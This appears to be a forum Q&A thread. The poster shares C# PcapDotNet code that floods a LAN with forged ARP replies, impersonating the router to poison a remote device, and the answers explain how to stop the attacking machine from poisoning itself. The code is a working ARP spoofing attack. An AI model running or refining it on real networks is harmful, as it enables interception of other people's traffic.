# ARP poisoning to myself

Tags: c#, network-programming, winpcap, arp, pcap.net

I'm using PcapDotNet to create ARP poison packets with the next code:

```
using (PacketCommunicator communicator =
            selectedDevice.Open(100, PacketDeviceOpenAttributes.Promiscuous, 1000)) 
        {
            while (true)
            {
                Packet arp;

                EthernetLayer ethernetLayer = new EthernetLayer
                {
                    Source = new MacAddress("f8:d1:11:05:8c:91"), // My Mac
                    Destination = new MacAddress("5c:da:d4:29:6d:5f"), // Remote device IP
                    EtherType = EthernetType.None, // Will be filled automatically.
                };

                ArpLayer arpLayer = new ArpLayer
                {
                    ProtocolType = EthernetType.IpV4,
                    Operation = ArpOperation.Reply,
                    SenderHardwareAddress = new byte[] { 0xf8, 0xd1, 0x11, 0x05, 0x8c, 0x91 }.AsReadOnly(), // My MAC
                    SenderProtocolAddress = new byte[] { 192, 168, 1, 254 }.AsReadOnly(), // My Router IP

                    TargetHardwareAddress = new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }.AsReadOnly(),
                    TargetProtocolAddress = new byte[] { 0, 0, 0, 0 }.AsReadOnly(),
                };

                PacketBuilder builder = new PacketBuilder(ethernetLayer, arpLayer);

                arp = builder.Build(DateTime.Now);

                communicator.SendPacket(arp);
                System.Threading.Thread.Sleep(500);
            }
        }
```

The problem is: I can poison the remote device, but I lost internet in my PC too (Poisoning to myself?).
I think maybe the problem is I must to indicate (in some way) that I want my own system do not read my sent packets... but i dont know how....
Can someone explain me what's is the problem here?

Comment: Only doing a concept test...

Answer (score 2):

Mark your ARP entry containing the gateway IP as static (With the correct hardware address).
To do so, execute the following in cmd as administrator:

```
netsh interface ip add neighbors "{Network Device}" {IP Address} {MAC Address}
```

Network device is for example *"Local Area Connection"* or *"Ethernet"* (Don't forget the quotes).  To find which network device you are currently using, execute the command "*ncpa.cpl*".

if you want to delete a static entry, execute the following command in cmd:

```
netsh interface ip delete neighbors "{Network Device}" {IP Address}
```

Also, keep in mind that one of the reasons you could have no internet is because all the traffic in the network are redirected to your host.  Since your host doesn't have the same capabilities as a router, network congestion may occur.  To be sure that the reason you do not have access to the internet is because you are poisoning yourself, execute the command "*arp -a*" in cmd and check the hardware address of the router.  If the hardware address is the same as your host's hardware address, then you are poisoning yourself.

Comment: Creating a static arp entry is one solution but, is there another one? When I try to do arp spoofing, I am spoofing my own table as you said and the mac addresses of the router and my host are the same. Is there anyway to tell the OS to not read the spoofed packets content?

Answer (score 0):

Is it possible that you are creating a poison record for you router internal IP? If that is so, then it's no surprise your internet connection stops working, as your OS will no longer be able to send anything to your router, and, therefore, to the internet.